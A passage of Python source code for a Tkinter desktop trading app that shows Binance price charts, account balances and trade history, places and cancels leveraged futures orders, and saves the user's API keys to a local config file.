app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.4f" % float(mylist4[m][0]))
elif prSt < 0.0001:
app.graph_Zm.create_text(30,y1 + 0*grSt/2,text="%.8f" % float(mylist4[m][0]))
#______________Timer for checking running Deamon processes before terminate the program
class Timer_End:
def __init__(self):
while True:
if TE_Tck==True and TE_Cnd == True and TE_CndSm == True and TE_BU == True and TE_AB == True and TE_Zm == True and TE_OrdTmr == True:
root.destroy()
break
time.sleep(0.01)
#______________Shutting down the program (close window button)
def close_window():
global ep
global should_run_T
global should_run_C
global should_run_S
global should_run_BU
global should_run_AB
global should_run_OT
global should_run_OZ
global PS1
global PS_BU
global PS_AB
global PS_OT
global Ord_Zm
ep=messagebox.askokcancel(title=None, message='Do you really want to exit the program?')
if ep==True:
should_run_T=False
PS1 = True
should_run_C=False
should_run_S=False
should_run_BU=False
PS_BU = False
should_run_AB=False
PS_AB = False
should_run_OT=False
PS_OT = False
should_run_OZ=False
Ord_Zm = False
TEPr = threading.Thread(target=Timer_End,daemon=True)
TEPr.start()
#______________BUTTON 1_CLICK BEGIN - Start/Stop TICK/CANDLE GRAPH
def click_button1():
global should_run_T
global should_run_C
global should_run_S
global myFont
global PS1
#print(GS)
myFont = font.Font(size=15)
app.button_1['font'] = myFont
if GS == 'TICK':
if should_run_T == True:
should_run_T = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
else:
PS1 = False
t1 = threading.Thread(target=Timer_Tick,daemon=True)
t1.start()
app.button_1.config(text="Stop", fg='red')
should_run_T = True
elif GS == 'CANDLE 1m' or GS == 'CANDLE 5m' or GS == 'CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h' or GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
if should_run_C == True:
should_run_C = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
else:
PS1 = False
t2 = threading.Thread(target=Timer_Candle,daemon=True)
t2.start()
app.button_1.config(text="Stop", fg='red')
should_run_C = True
elif GS == 'CANDLE SUMM':
if should_run_S == True:
should_run_S = False
PS1 = True
app.button_1['font']=myFont
app.button_1.config(text="Start", fg='green')
else:
PS1 = False
timer_3_CSumm = threading.Thread(target=Timer_Candle_Summ,daemon=True)
timer_3_CSumm.start()
app.button_1.config(text="Stop", fg='red')
should_run_S = True
#______________BUTTON 1_CLICK END - Start/Stop TICK/CANDLE GRAPH
#______________BUTTON 2_CLICK BEGIN - Start/Stop BTC WATCHER
def click_button2():
global PS_BU
global should_run_BU
myFont = font.Font(size=10)
app.button_2['font'] = myFont
#print (PS_BU, should_run_BU)
if PS_BU == True and should_run_BU == True:
PS_BU = False
should_run_BU = False
app.button_2.config(text="Start", fg='green')
elif PS_BU == False and should_run_BU == False:
PS_BU = True
should_run_BU = True
timer_BU = threading.Thread(target=Timer_BTCUSDT,daemon=True)
timer_BU.start()
app.button_2.config(text="Stop", fg='red')
#______________BUTTON 2_CLICK END - Start/Stop BTC WATCHER
#______________BUTTON AB_CLICK BEGIN - Start/Stop ACCOUNT BALANCES WATCHER + FUTURES POSITIONS WATCHER
def click_buttonAB():
global PS_AB
global should_run_AB
myFont = font.Font(size=10)
app.button_AB['font'] = myFont
#print (PS_AB, should_run_AB)
if PS_AB == True and should_run_AB == True:
PS_AB = False
should_run_AB = False
app.button_AB.config(text="Start", fg='green')
elif PS_AB == False and should_run_AB == False:
PS_AB = True
should_run_AB = True
timer_AB = threading.Thread(target=Timer_AccBlns,daemon=True)
timer_AB.start()
app.button_AB.config(text="Stop", fg='red')
#______________BUTTON 2_CLICK END - Start/Stop BTC WATCHER + FUTURES WALLET WATCHER
#______________BUTTON OrdTmr_CLICK BEGIN - Start/Stop DEPTH TIMER
def click_button_OrdTmr():
global PS_OT
global should_run_OT
myFont = font.Font(size=10)
app.button_OrdTmr['font'] = myFont
#print (PS_BU, should_run_BU)
if PS_OT == True and should_run_OT == True:
PS_OT = False
should_run_OT = False
app.button_OrdTmr.config(text="Orders start", fg='green')
elif PS_OT == False and should_run_OT == False:
PS_OT = True
should_run_OT = True
timer_OT = threading.Thread(target=Timer_OrdTmr,daemon=True)
timer_OT.start()
app.button_OrdTmr.config(text="Orders stop", fg='red')
#______________BUTTON OrdTmr_CLICK END - Start/Stop DEPTH TIMER
#______________BUTTON Zm_CLICK BEGIN - Start/Stop DEPTH ZOOM
def click_button_Zm():
global Ord_Zm
global should_run_OZ
wh = root.winfo_height()
ww = root.winfo_width()
if Ord_Zm == False:
should_run_OZ = True
Ord_Zm = True
app.graph_Zm.place(x=ww-420,y=150,width=200,height=wh-320)
app.graph_2.place_forget()
app.button_Ord.config(text="Stop Zoom")
timer_Zm = threading.Thread(target=Timer_Zoom,daemon=True)
timer_Zm.start()
else:
should_run_OZ = False
Ord_Zm = False
app.button_Ord.config(text="Start Zoom")
app.graph_2.place(x=ww-420,y=150,width=200,height=wh-320)
app.graph_Zm.place_forget()
#______________BUTTON Zm_CLICK END - Start/Stop DEPTH ZOOM
#______________BUTTON NwOL_CLICK BEGIN (New Order Long) - SET NEW LONG FUTURES ORDER
def click_buttonNwOL():
#Close position By default the futures keeps the position mode to One-way. In order to enable the new feature of Hedge Mode, so you can have dual sides positions.
#enable it by endpoint POST /fapi/v1/positionSide/dual, setting the parameter dualSidePosition = true
#Open position: Long : positionSide=LONG, side=BUY Short: positionSide=SHORT, side=SELL
#Close position: Close long position: positionSide=LONG, side=SELL Close short position: positionSide=SHORT, side=BUY
if MS == 'FUTURES':
k1_f = float(app.text_POrd.get(1.0,'end'))
k1_s = app.text_POrd.get(1.0,'end')
k2_f = float(app.text_QOrd.get(1.0,'end'))
k2_s = app.text_QOrd.get(1.0,'end')
k3_f=(k2_f*int(Lvrg))/k1_f
#print(k3_f,' ', orLSS)
if float(orLSS) >= 1:
k3_s = int(k3_f)
elif 1> float(orLSS) >= 0.1:
k3_s = "%.1f" % (k3_f)
elif 0.1 > float(orLSS) >= 0.01:
k3_s = "%.2f" % (k3_f)
elif 0.01 > float(orLSS) >= 0.001:
k3_s = "%.3f" % (k3_f)
elif 0.001 > float(orLSS) >= 0.0001:
k3_s = "%.4f" % (k3_f)
elif 0.00001 <= float(orLSS) < 0.0001:
k3_s = "%.5f" % (k3_f)
elif 0.000001 <= float(orLSS) < 0.00001:
k3_s = "%.6f" % (k3_f)
elif 0.0000001 <= float(orLSS) < 0.000001:
k3_s = "%.7f" % (k3_f)
elif float(orLSS) < 0.0000001:
k3_s = "%.8f" % (k3_f)
#print(k3_s)
if k1_f > 0 and k2_f > 0:
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='LONG', type='LIMIT', timeInForce='GTC', quantity=k3_s, price=k1_f, newOrderRespType='FULL')
sys_msg = ' Buy order ' + grSmb + ' in LONG by price ' + str(k1_f) + ' USDT in an amount ' + str(k3_s) + ' is set.'
sys_msg += ' Margin ' + str(k2_f) +' USDT, order sum ' + str(k3_f*k1_f) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOL_CLICK END (New Order Long) - SET NEW LONG FUTURES ORDER
#______________BUTTON NwOL_CLICK BEGIN (New Order Short) - SET NEW SHORT FUTURES ORDER
def click_buttonNwOS():
if MS == 'FUTURES':
k1_f = float(app.text_POrd.get(1.0,'end'))
k1_s = app.text_POrd.get(1.0,'end')
k2_f = float(app.text_QOrd.get(1.0,'end'))
k2_s = app.text_QOrd.get(1.0,'end')
k3_f=(k2_f*int(Lvrg))/k1_f
#print(k3_f)
if float(orLSS) >= 1:
k3_s = int(k3_f)
elif 1> float(orLSS) >= 0.1:
k3_s = "%.1f" % (k3_f)
elif 0.1 > float(orLSS) >= 0.01:
k3_s = "%.2f" % (k3_f)
elif 0.01 > float(orLSS) >= 0.001:
k3_s = "%.3f" % (k3_f)
elif 0.001 > float(orLSS) >= 0.0001:
k3_s = "%.4f" % (k3_f)
elif 0.00001 <= float(orLSS) < 0.0001:
k3_s = "%.5f" % (k3_f)
elif 0.000001 <= float(orLSS) < 0.00001:
k3_s = "%.6f" % (k3_f)
elif 0.0000001 <= float(orLSS) < 0.000001:
k3_s = "%.7f" % (k3_f)
elif float(orLSS) < 0.0000001:
k3_s = "%.8f" % (k3_f)
if k1_f > 0 and k2_f > 0:
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='SHORT', type='LIMIT', timeInForce='GTC', quantity=k3_s, price=k1_f, newOrderRespType='FULL')
sys_msg = ' Buy order ' + grSmb + ' in SHORT by price ' + str(k1_f) + ' USDT in an amount ' + str(k3_s) + ' is set.'
sys_msg += ' Margin ' + str(k2_f) +' USDT, order sum ' + str(k3_f*k1_f) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOL_CLICK END (New Order Short) - SET NEW SHORT FUTURES ORDER
#______________BUTTON NwODel_CLICK BEGIN (New Order Delete) - DELETE NEW LONG/SHORT FUTURES ORDER
def click_buttonNwODel():
#print('delete order')
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['type'])=='LIMIT' and str(BnFAcc1['positionSide'])=='LONG':
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position LONG LIMIT order deleted [' + grSmb + '], Price: ' + str(BnFAcc1['price']) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['type'])=='LIMIT' and str(BnFAcc1['positionSide'])=='SHORT':
#print(BnFAcc1)
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Position SHORT LIMIT order deleted [' + grSmb + '], Price: ' + str(BnFAcc1['price']) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOShow_CLICK BEGIN (New Order Show) - SHOW/HIDE NEW FUTURES ORDER
def click_buttonNwOShow():
global NwOrSw
if should_run_C == True and MS == 'FUTURES' and NwOrSw==False:
if PosSide == 'LONG':
k1=float(app.text_POrd.get(1.0,'end'))
k2=float(app.text_QOrd.get(1.0,'end'))
k3=(k2*float(Lvrg_Tmp))/k1
yyC =float(k1)-((float(k1)*(float(k3)/(float(Lvrg_Tmp)+1)))/float(k3))
yyC1 = grMd - (((k1+(k1-yyC))-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_TP, 850,yyC1,880,yyC2)
#print(PosSide)
yyC1 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_SL, 850,yyC1,880,yyC2)
if PosSide == 'SHORT':
#print(PosSide)
k1=float(app.text_POrd.get(1.0,'end'))
k2=float(app.text_QOrd.get(1.0,'end'))
k3=(k2*float(Lvrg_Tmp))/k1
yyC =float(k1)+((float(k1)*(float(k3)/(float(Lvrg_Tmp)+1)))/float(k3))
yyC1 = grMd - (((k1+(k1-yyC))-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_TP, 850,yyC1,880,yyC2)
yyC1 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_SL, 850,yyC1,880,yyC2)
NwOrSw=True
#print(NwOrSw)
app.button_NwOSw.config(text="Hide", fg='red')
elif should_run_C == True and MS == 'FUTURES' and NwOrSw==True:
NwOrSw=False
app.button_NwOSw.config(text="Show", fg='black')
app.graph_Cn.coords(GOS_SL, 0,0,0,0)
app.graph_Cn.coords(GOS_TP, 0,0,0,0)
#______________BUTTON NwOShow_CLICK END (New Order Show) - SHOW/HIDE NEW FUTURES ORDER
#______________BUTTONS END
#______________MENU BEGIN
#______________MENU ACCOUNT_CLICK BEGIN - SHOW NEW WINDOW WITH BINANCE ACCOUNT KEYS
def clicked_Bnacc():
global rootAcc
global app_acc
rootAcc = Tk()
app_acc = AccWn(rootAcc)
rootAcc.title('Binance keys')
rootAcc.geometry('550x120+150+100')
rootAcc.resizable(width=False, height=False)
rootAcc.mainloop()
#______________MENU ACCOUNT_CLICK END - SHOW NEW WINDOW WITH BINANCE ACCOUNT KEYS
#______________MENU ACCOUNT BUTTON SAVE CLICK BEGIN - SAVE KEYS
def click_button_AccSave():
global bot
global API_KEY_s
global API_SECRET_s
API_KEY_s = app_acc.text_AK.get(1.0,'end').replace("\n", "")
API_SECRET_s = app_acc.text_AS.get(1.0,'end').replace("\n", "")
if API_KEY_s != '' and API_SECRET_s != '':
bot = Binance(API_KEY=API_KEY_s, API_SECRET=API_SECRET_s)
my_file_Account = open("iTrader.cfg", "w")
sTmp = bot.API_KEY
sTmp += '\n'
sTmp += str(bot.API_SECRET, 'utf-8')
my_file_Account.write(sTmp)
my_file_Account.close()
messagebox.showinfo("Set account KEYs", "Data saved successfully.")
rootAcc.destroy()
#______________MENU ACCOUNT BUTTON SAVE CLICK BEGIN - SAVE KEYS
#______________MENU BALANCES_CLICK BEGIN - SHOW NEW WINDOW WITH BALANCES
def clicked_blns():
rootBlns = Tk()
rootBlns.title('Binance balances')
rootBlns.geometry('800x850+150+100')
tab_control = ttk.Notebook(rootBlns)
tab1 = ttk.Frame(tab_control)
tab2 = ttk.Frame(tab_control)
tab3 = ttk.Frame(tab_control)
tab_control.add(tab1, text='SPOT')
lbl1 = Label(tab1, text='Tab 1',justify=LEFT)
lbl1.grid(column=0, row=0)
tab_control.add(tab2, text='FUTURES')
lbl2 = Label(tab2, text='Tab 2',justify=LEFT)
lbl2.grid(column=0, row=0)
tab_control.add(tab3, text='MARGIN')
tab_control.pack(expand=1, fill='both')
#__Заполнение Tab 1 - SPOT WALLETS
BnAcc = bot.account()
BnAcc1 = BnAcc.get('makerCommission')
sTmp = '\n 1. (makerCommission):' + str(BnAcc1)
BnAcc2 = BnAcc['takerCommission']
sTmp += '\n 2. takerCommission:' + str(BnAcc2)
BnAcc3 = BnAcc['buyerCommission']
sTmp += '\n 3. buyerCommission:' + str(BnAcc3)
BnAcc4 = BnAcc['sellerCommission']
sTmp += '\n 4. sellerCommission:' + str(BnAcc4)
BnAcc5 = BnAcc['canTrade']
sTmp += '\n 5. canTrade:' + str(BnAcc5)
BnAcc6 = BnAcc['canWithdraw']
sTmp += '\n 6. canWithdraw:' + str(BnAcc6)
BnAcc7 = BnAcc['canDeposit']
sTmp += '\n 7. canDeposit:' + str(BnAcc7)
BnAcc8 = BnAcc['updateTime']
sTmp += '\n 8. updateTime:' + str(BnAcc8)
BnAcc9 = BnAcc['accountType']
sTmp += '\n 9. accountType:' + str(BnAcc9)
BnAcc10 = BnAcc['balances']
sTmp += '\n 10. balances_len:' + str(len(BnAcc10))
BnAcc101=BnAcc10[0]
for mm in range(len(BnAcc10)):
BnAcc101 = BnAcc10[mm]
if float(BnAcc101['free']) > 0 or float(BnAcc101['locked']) > 0:
sTmp += '\n balance: ' + str(BnAcc101['asset']) + ". Free: " + str(BnAcc101['free']) + ". Locked: " + str(BnAcc101['locked'])
BnAcc11 = BnAcc['permissions']
sTmp += "\n 11 permissions_len " + str(len(BnAcc11)) + 'permissions:'+ str(BnAcc11)
for mm in range(len(BnAcc11)):
if BnAcc11[mm] == 'SPOT':
sTmp += "\n 11 permissions_SPOT = TRUE (Спотовая торговля)"
if BnAcc11[mm] == 'LEVERAGED':
sTmp += "\n 11 permissions_LEVERAGED = TRUE (Маржинальная торговля?)"
lbl1.config(text = sTmp)
#__Заполнение Tab 2 - FUTURES WALLETS
sTmp = ''
BnFAcc = bot.futuresBalance()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
sTmp += '\n balance: ' + str(BnFAcc1['asset']) + ". Total: " + str(BnFAcc1['balance']) + ". Available: " + str(BnFAcc1['withdrawAvailable'])
lbl2.config(text = sTmp)
rootBlns.mainloop()
#______________MENU BALANCES_CLICK END - SHOW NEW WINDOW WITH BALANCES
#______________MENU ORDERS_CLICK BEGIN - SHOW NEW WINDOW WITH ORDERS
def clicked_Ordrs():
rootBlns = Tk()
rootBlns.title('Binance orders')
rootBlns.geometry('800x850+150+100')
tab_control = ttk.Notebook(rootBlns)
tab1 = ttk.Frame(tab_control)
tab2 = ttk.Frame(tab_control)
tab3 = ttk.Frame(tab_control)
tab_control.add(tab1, text='SPOT trades')
lbl1 = Label(tab1, text='Tab 1',justify=LEFT)
lbl1.grid(column=0, row=0)
tab_control.add(tab2, text='SPOT orders')
lbl2 = Label(tab2, text='Tab 2',justify=LEFT)
lbl2.grid(column=0, row=0)
tab_control.add(tab3, text='FUTURES trades')
lbl3 = Label(tab3, text='Tab 3',justify=LEFT)
lbl3.grid(column=0, row=0)
tab_control.pack(expand=1, fill='both')
BnAcc = bot.account()
#The method allows you to get the trading history of an authorized user for the specified pair.
#Weight – 5.
#Parameters:
#Mandatory:
#symbol – pair
#timestamp – the current time (it is entered automatically in the presented code, it is not necessary to specify)
#Optional:
#limit – number of returned transactions (maximum 500, default 500)
#fromId – with which transaction to start the withdrawal. By default, the most recent ones are displayed.
#recvWindow – request validity window.
BnMt = bot.myTrades(symbol=grSmb)
#print (len(BnMt))
sTmp = 'BNBUSDT'
if len(BnMt)>0:
for mm in range(len(BnMt)):
BnMtM = BnMt[mm]
sTmp += '\n 1. ' + str(datetime.datetime.fromtimestamp(BnMtM['time']/1000))
if BnMtM['isBuyer'] == True:
sTmp += ' Buy'
else:
sTmp += ' Sell'
sTmp += '\n' + 'Price:' + str(BnMtM['price']) + '. Qty:' + str(BnMtM['qty']) + '. Sum:' + str(BnMtM['quoteQty'])
sTmp += '\n Commission:' + str(BnMtM['commissionAsset']) + ": "+ str(BnMtM['commission'])
lbl1.config(text = sTmp)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("%d.%m.%Y %H-%M-%S")
my_file_Trades = open(time_local_str + "_Trades.txt", "w")
my_file_PnL = open(time_local_str + "_PnL.txt", "w")
my_file_Cms = open(time_local_str + "_Cms.txt", "w")
my_file_AllTrades = open(time_local_str + "_AllTds.txt", "w")
BnMt = bot.userTrades(fromId=1,limit=1000)
#print(BnMt[0])
TTT=int((int(time.mktime(time.localtime()))-604800)*1000)
#print(int(time.mktime(time.localtime())))
sTmp = ''
sTmp_PnL = ''
sTmpF=''
sTmpF_PnL=''
sTmp_Cms = ''
sTmpF_Cms = ''
sTmp_AT = ''
sTmpF_AT = ''
while TTT < int(int(time.mktime(time.localtime()))*1000):
BnMt = bot.userTrades(startTime=TTT,limit=1000)
sTmp = ''
sTmp_PnL = ''
sTmp_Cms = ''
sTmp_AT = ''
for i in range(len(BnMt) - 1, -1, -1):
if i > 0 and float(BnMt[i]['realizedPnl']) != 0:
sTmp += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\tid:' + str(BnMt[i]['id']) + '\ts:' + str(BnMt[i]['symbol'])
sTmp += '\t' + str(BnMt[i]['positionSide']) + '\tPNL: ' + str(BnMt[i]['realizedPnl'])
sTmp += '\t\t' + str(BnMt[i]['price']) + ' * ' + str(BnMt[i]['qty']) + ' = ' + str(BnMt[i]['quoteQty'])
sTmp_PnL += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\t' + str(BnMt[i]['realizedPnl'])
elif i ==0:
sTmp += ''
if i > 0 and float(BnMt[i]['commission']) > 0:
sTmp_Cms += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\t' + str(BnMt[i]['commission']) + '\t' + str(BnMt[i]['commissionAsset'])
if i > 0:
sTmp_AT += '\n' + str(BnMt[i])
sTmpF =sTmp + sTmpF
sTmpF_PnL = sTmp_PnL + sTmpF_PnL
sTmpF_Cms = sTmp_Cms + sTmpF_Cms
sTmpF_AT = sTmp_AT + sTmpF_AT
TTT +=604800000
my_file_Trades.write(sTmpF)
my_file_Trades.close()
my_file_PnL.write(sTmpF_PnL)
my_file_PnL.close()
my_file_Cms.write(sTmpF_Cms)
my_file_Cms.close()
my_file_AllTrades.write(sTmpF_AT)
my_file_AllTrades.close()
lbl3.config(text = sTmp)
rootBlns.mainloop()
#______________MENU ORDERS_CLICK END - SHOW NEW WINDOW WITH ORDERS
#______________MENU END
#______________ACCOUNT API KEYS WINDOW GUI BEGIN
class AccWn:
def __init__(self, window):
global API_KEY_sT
global API_SECRET_sT
self.label_AK = Label(rootAcc, text="API-Key: ", anchor=NW, justify=LEFT)
self.label_AK.place(height=30,width=70,x=1,y=10)
self.text_AK = Text(rootAcc)
self.text_AK.place(height=20,width=440,x=80,y=10)
self.label_AS = Label(rootAcc, text="API-Secret: ", anchor=NW, justify=LEFT)
self.label_AS.place(height=30,width=70,x=1,y=40)
self.text_AS = Text(rootAcc)
self.text_AS.place(height=20,width=440,x=80,y=40)
self.text_AK.insert(1.0, API_KEY_s)
self.text_AS.insert(1.0, API_SECRET_s)
self.Buttn_Acc_Sv = Button(rootAcc,text="Save",fg='green', command=click_button_AccSave)
self.Buttn_Acc_Sv.place(height=30,width=100,x=10,y=80)
self.Buttn_Acc_Cl = Button(rootAcc,text="Close",fg='black', command=rootAcc.destroy)
self.Buttn_Acc_Cl.place(height=30,width=100,x=440,y=80)
#______________ACCOUNT API KEYS WINDOW GUI END
#______________MAIN WINDOW GUI BEGIN
class gui:
def __init__(self, window):
global OrdSz
global PSDvar
#__Пустой label - просто фон
self.label_7 = Label(root, text="This is the background!", bg="white")
self.label_7.place(height=10,width=10,x=10,y=10)
#__third label - Graph must be here
self.label_Grpf = Label(root, text="Here's the graph!", bg="lightgreen")
self.label_Grpf.place(height=500,width=510,x=10,y=150)
#__fourth label - Market orders must be here
self.label_Ord = Label(root, text="", bg="lightgreen")
self.label_Ord.place(height=500,width=150,x=410,y=150)
#______________LEFT TOP SIDE START
#__first label - balances, order size
self.label_BlnsSpt = Label(root, text="SPOT balance = 0 USDT", anchor=NW, justify=LEFT)
self.label_BlnsSpt.place(height=50,width=190,x=10,y=10)
#__second label - search, TP, SL
self.label_2 = Label(root, text="FUTURES balance = 0 USDT", anchor=NW, justify=LEFT)
self.label_2.place(height=50,width=190,x=10,y=60)
#__Order size
OrdSz = DoubleVar()
OrdSz.set(10)
self.OrdSz_5 = Radiobutton(text="5$", command=lambda i=5: self.OrdSz_Ch(i), variable=OrdSz, value=5,indicatoron=0)
self.OrdSz_10 = Radiobutton(text="10$", command=lambda i=10: self.OrdSz_Ch(i), variable=OrdSz, value=10,indicatoron=0)
self.OrdSz_15 = Radiobutton(text="15$", command=lambda i=15: self.OrdSz_Ch(i), variable=OrdSz, value=15,indicatoron=0)
self.OrdSz_20 = Radiobutton(text="20$", command=lambda i=20: self.OrdSz_Ch(i), variable=OrdSz, value=20,indicatoron=0)
self.OrdSz_25 = Radiobutton(text="25$", command=lambda i=25: self.OrdSz_Ch(i), variable=OrdSz, value=25,indicatoron=0)
self.OrdSz_30 = Radiobutton(text="30$", command=lambda i=30: self.OrdSz_Ch(i), variable=OrdSz, value=30,indicatoron=0)
self.OrdSz_05 = Radiobutton(text="5%", command=lambda i=0.05: self.OrdSz_Ch(i), variable=OrdSz, value=0.05,indicatoron=0)
self.OrdSz_010 = Radiobutton(text="10%", command=lambda i=0.10: self.OrdSz_Ch(i), variable=OrdSz, value=0.10,indicatoron=0)
self.OrdSz_025 = Radiobutton(text="25%", command=lambda i=0.25: self.OrdSz_Ch(i), variable=OrdSz, value=0.25,indicatoron=0)
self.OrdSz_050 = Radiobutton(text="50%", command=lambda i=0.50: self.OrdSz_Ch(i), variable=OrdSz, value=0.50,indicatoron=0)
self.OrdSz_075 = Radiobutton(text="75%", command=lambda i=0.75: self.OrdSz_Ch(i), variable=OrdSz, value=0.75,indicatoron=0)
self.OrdSz_090 = Radiobutton(text="90%", command=lambda i=0.90: self.OrdSz_Ch(i), variable=OrdSz, value=0.90,indicatoron=0)
self.OrdSz_5.place(height=15,width=30,x=10,y=115)
self.OrdSz_10.place(height=15,width=30,x=40,y=115)
self.OrdSz_15.place(height=15,width=30,x=70,y=115)
self.OrdSz_20.place(height=15,width=30,x=100,y=115)
self.OrdSz_25.place(height=15,width=30,x=130,y=115)
self.OrdSz_30.place(height=15,width=30,x=160,y=115)
self.OrdSz_05.place(height=15,width=30,x=10,y=130)
self.OrdSz_010.place(height=15,width=30,x=40,y=130)
self.OrdSz_025.place(height=15,width=30,x=70,y=130)
self.OrdSz_050.place(height=15,width=30,x=100,y=130)
self.OrdSz_075.place(height=15,width=30,x=130,y=130)
self.OrdSz_090.place(height=15,width=30,x=160,y=130)
#_______________LEFT TOP SIDE END
#_______________RIGHT TOP SIDE START
#__Label BTC/USDT watch - grow/fall
self.label_BU = Label(root, text="BTC/USDT +0 %", anchor=NW, justify=LEFT)
self.label_BU.place(height=40,width=200,x=510,y=10)
#__наблюдатель BTC/USDT start/stop button - start/stop timer
self.button_2 = Button(root, text="Start", command=click_button2)
self.button_2.place(height=40,width=50,x=460,y=10)
#__Label FUTURES Ords + PnL
self.label_PnL = Label(root, text="FUTURES positions:\nPnL: +0 %", anchor=NW, justify=LEFT)
self.label_PnL.place(height=60,width=250,x=510,y=60)
#__Account balances start/stop button - start/stop timer
self.button_AB = Button(root, text="Start", command=click_buttonAB)
self.button_AB.place(height=60,width=50,x=460,y=60)
#__Label FUTURES Hedge Mode
self.label_HM = Label(root, text="Hedge Mode: ", anchor=NW, justify=LEFT)
self.label_HM.place(height=40,width=250,x=460,y=130)
#_______________RIGHT TOP SIDE END
#_______________MIDDLE TOP SIDE START
self.Tree_Pos=ttk.Treeview(selectmode='none')
self.Tree_Pos['columns']=('Side','Symbol','Leverage','PnL','Price','markPrice','Liquid', 'Qty')
self.Tree_Pos.column("#0",width=0,stretch=NO)
self.Tree_Pos.column("Side",anchor=W,width=80)
self.Tree_Pos.column("Symbol",anchor=W,width=80)
self.Tree_Pos.column("Leverage",anchor=W,width=80)
self.Tree_Pos.column("PnL",anchor=W,width=80)
self.Tree_Pos.column("Price",anchor=W,width=80)
self.Tree_Pos.column("markPrice",anchor=W,width=80)
self.Tree_Pos.column("Liquid",anchor=W,width=80)
self.Tree_Pos.column("Qty",anchor=W,width=80)
self.Tree_Pos.heading("#0",text="",anchor=CENTER)
self.Tree_Pos.heading("Side",text="Side",anchor=CENTER)
self.Tree_Pos.heading("Symbol",text="Symbol",anchor=CENTER)
self.Tree_Pos.heading("Leverage",text="Leverage",anchor=CENTER)
self.Tree_Pos.heading("PnL",text="PnL",anchor=CENTER)
self.Tree_Pos.heading("Price",text="Price",anchor=CENTER)
self.Tree_Pos.heading("markPrice",text="markPrice",anchor=CENTER)
self.Tree_Pos.heading("Liquid",text="Liquid",anchor=CENTER)
self.Tree_Pos.heading("Qty",text="Qty",anchor=CENTER)
self.Tree_Pos.place(height=150,width=300,x=210,y=10)
self.Tree_Pos_VScrl = Scrollbar(root,command=self.Tree_Pos.yview)
self.Tree_Pos_VScrl.place(height=150,width=10,x=510,y=10)
self.Tree_Pos.config(yscrollcommand=self.Tree_Pos_VScrl.set)
#_______________MIDDLE TOP SIDE END
#_______________RIGHT SIDE START
# fith label - Buttons for my orders must be here
self.label_Cmd = Label(root, text="", bg="lightgray", justify=LEFT)
self.label_Cmd.place(height=500,width=100,x=510,y=150)
#__seventh label - symbol of pair here
self.label_P = Label(root, text="BNB/USDT", bg="lightgray", anchor=NW, justify=LEFT)
self.label_P.place(height=30,width=100,x=510,y=150)
self.CB_MrgT = Combobox(root,state="readonly")
self.CB_MrgT['values'] = ('NONE','ISOLATED', 'CROSSED')
self.CB_MrgT.current(0)
self.CB_MrgT.place(height=30,width=100,x=510,y=200)
self.CB_MrgT.bind('<<ComboboxSelected>>',self.CB_MrgT_changed)
self.CB_Lvrg = Combobox(root,state="readonly")
self.CB_Lvrg['values'] = ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20')
self.CB_Lvrg.current(0)
self.CB_Lvrg.place(height=30,width=40,x=620,y=200)
self.CB_Lvrg.bind('<<ComboboxSelected>>',self.CB_Lvrg_changed)
self.button_MrLvSet = Button(root, text="Save", command=self.click_button_MrLvSet)
self.button_MrLvSet.place(height=30,width=50,x=660,y=200)
#__PAIR SELECT
self.CB_P = Combobox(root)
self.CB_P['values'] = ('BNBUSDT', 'BTCUSDT', 'ETHUSDT', 'WAVESUSDT', 'EOSUSDT')
self.CB_P.current(0)
self.CB_P.place(height=30,width=200,x=510,y=250)
self.CB_P.bind('<<ComboboxSelected>>',self.CB_P_changed)
MPSLvar=StringVar()
MPSL_list = ['SPOT', 'FUTURES', 'MARGIN']
MPSLvar.set(MPSL_list[0])
self.MPSL = OptionMenu(root,MPSLvar,*MPSL_list,command=self.market_selected)
self.MPSL.place(height=30,width=100,x=510,y=190)
SPSLvar=StringVar()
SPSL_list = ['All', 'USDT']
SPSLvar.set(SPSL_list[1])
